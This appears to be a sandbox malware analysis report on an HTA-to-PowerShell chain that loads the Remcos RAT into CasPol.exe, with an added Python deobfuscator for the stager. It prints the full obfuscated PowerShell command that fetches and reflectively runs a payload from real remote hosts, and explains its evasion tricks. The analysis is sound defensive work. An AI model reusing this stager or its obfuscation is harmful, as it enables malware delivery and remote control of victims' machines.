                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BB71 SystemParametersInfoW,13_2_0041BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BB77 SystemParametersInfoW,13_2_0041BB77

                    System Summary

                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2
F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
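The stage-2 command line above is a PowerShell string carrying three placeholder tokens that are repaired with -creplace/-replace at run time and then piped into an invoke cmdlet hidden as (gv '*MDr*').NAMe[3,11,2]. The reflective loader it calls is handed its next-stage URL written backwards, and the blob it fetches from filemail sits between <<BASE64_START>>/<<BASE64_END>> markers as reversed base64. The helper below is an added example, not part of the Joe Sandbox report, that undoes each of those tricks statically. The excerpt of the stager and the marker-wrapped download are constructed from the command line on this page (the download wraps a dummy blob, not the real loader); the assumption that *MDr* resolves to the automatic variable MaximumDriveCount holds for a default Windows PowerShell 5.1 session, which is the powershell.exe used here.

```python
"""Static deobfuscation of the stage-2 PowerShell stager seen in this report.
Added example; the excerpt and sample download below are constructed."""
import base64
import re

# Substitutions the stager applies before piping the text into iex, taken from
# the command line in the report:
#   ([chAR]115+[chAR]121+[chAR]86) -> [chAR]124   'syV' -> '|'
#   ([chAR]50+[chAR]107+[chAR]100) -> [chAR]36    '2kd' -> '$'
#   'eC4'                          -> [chAR]39    'eC4' -> "'"
SUBSTITUTIONS = (("syV", "|"), ("2kd", "$"), ("eC4", "'"))

# Constructed excerpt of the report's stage-2 script with the 'a'+'b'
# concatenation already joined; only the statements needed here are kept.
STAGE2_EXCERPT = (
    "2kdimageUrl = eC4https://3105.filemail.com/api/file/get?filekey="
    "shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg"
    "&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7ceC4;"
    "2kdbase64Reversed = -join (2kdbase64Command.ToCharArray() syV "
    "ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];"
    "2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);"
    "2kdvaiMethod.Invoke(2kdnull, @(eC4txt.FGVGFR/2241/62.64.861.401//:pttheC4, "
    "eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4, eC4CasPoleC4))"
)


def deobfuscate(text):
    """Apply the three placeholder substitutions in the order the stager does."""
    for needle, replacement in SUBSTITUTIONS:
        text = text.replace(needle, replacement)
    return text


def resolve_indexed_alias(variable_name, indices=(3, 11, 2)):
    """Resolve (gv '*MDr*').Name[3,11,2] -join ''.  Assumption: in a default
    Windows PowerShell 5.1 session the only variable matching *MDr* is
    MaximumDriveCount, whose characters 3, 11 and 2 spell 'iex'."""
    return "".join(variable_name[i] for i in indices)


def recover_loader_args(script):
    """Pull the argument list of the reflective .Invoke($null, @(...)) call and
    un-reverse the first element, which the stager writes backwards."""
    match = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script, re.S)
    if match is None:
        raise ValueError("no Invoke($null, @(...)) call found")
    args = [a.strip().strip("'") for a in match.group(1).split(",")]
    args[0] = args[0][::-1]
    return args


def extract_marked_payload(downloaded_text,
                           start="<<BASE64_START>>", end="<<BASE64_END>>"):
    """Emulate the stager's extraction: the text between the markers is base64
    written backwards, so reverse it and then decode it."""
    s = downloaded_text.find(start)
    e = downloaded_text.find(end)
    if s < 0 or e <= s:
        raise ValueError("payload markers not found")
    s += len(start)
    return base64.b64decode(downloaded_text[s:e][::-1], validate=True)


# Constructed stand-in for the file fetched from filemail: filler around the
# markers, wrapping a dummy blob instead of the real .NET loader.
FAKE_ASSEMBLY = b"constructed stand-in, not the real dnlib.IO.Home loader"
SAMPLE_DOWNLOAD = (
    "filler before the markers\n<<BASE64_START>>"
    + base64.b64encode(FAKE_ASSEMBLY).decode()[::-1]
    + "<<BASE64_END>>\nfiller after"
)

if __name__ == "__main__":
    script = deobfuscate(STAGE2_EXCERPT)
    print(script)
    print("invoke cmdlet:", resolve_indexed_alias("MaximumDriveCount"))
    print("loader args:", recover_loader_args(script))
    print("payload:", extract_marked_payload(SAMPLE_DOWNLOAD))
```

Two of the recovered arguments line up with the rest of the report: the un-reversed first argument is http://104.168.46.26/1422/RFGVGF.txt, the request seen in the network section, and the 'CasPol' argument names the host the loader injects into, which is where the Remcos payload is found (process 13, CasPol.exe). The repeated 'desativado' arguments are Portuguese for "disabled" and switch off optional loader features.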
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_004158B9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04BAA3F09_2_04BAA3F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04BA9AB69_2_04BA9AB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041D07113_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004520D213_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043D09813_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043715013_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004361AA13_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0042625413_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043137713_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043651C13_2_0043651C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0041E5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0044C739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_004367C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_004267CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0043C9DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00432A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00436A8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0043CC0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00436D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00434D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00426E73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00440E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0043CE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00452F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00426FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004020E7 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004338A5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00433FB0 appears 55 times
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe | Process created: Commandline size = 2024
Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 2398
Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@19/20@4/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bestofthingswithentiretimegivenebstthignstodowithgreat[1].tiff
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-EC111K
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nn253iy.hoi.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; 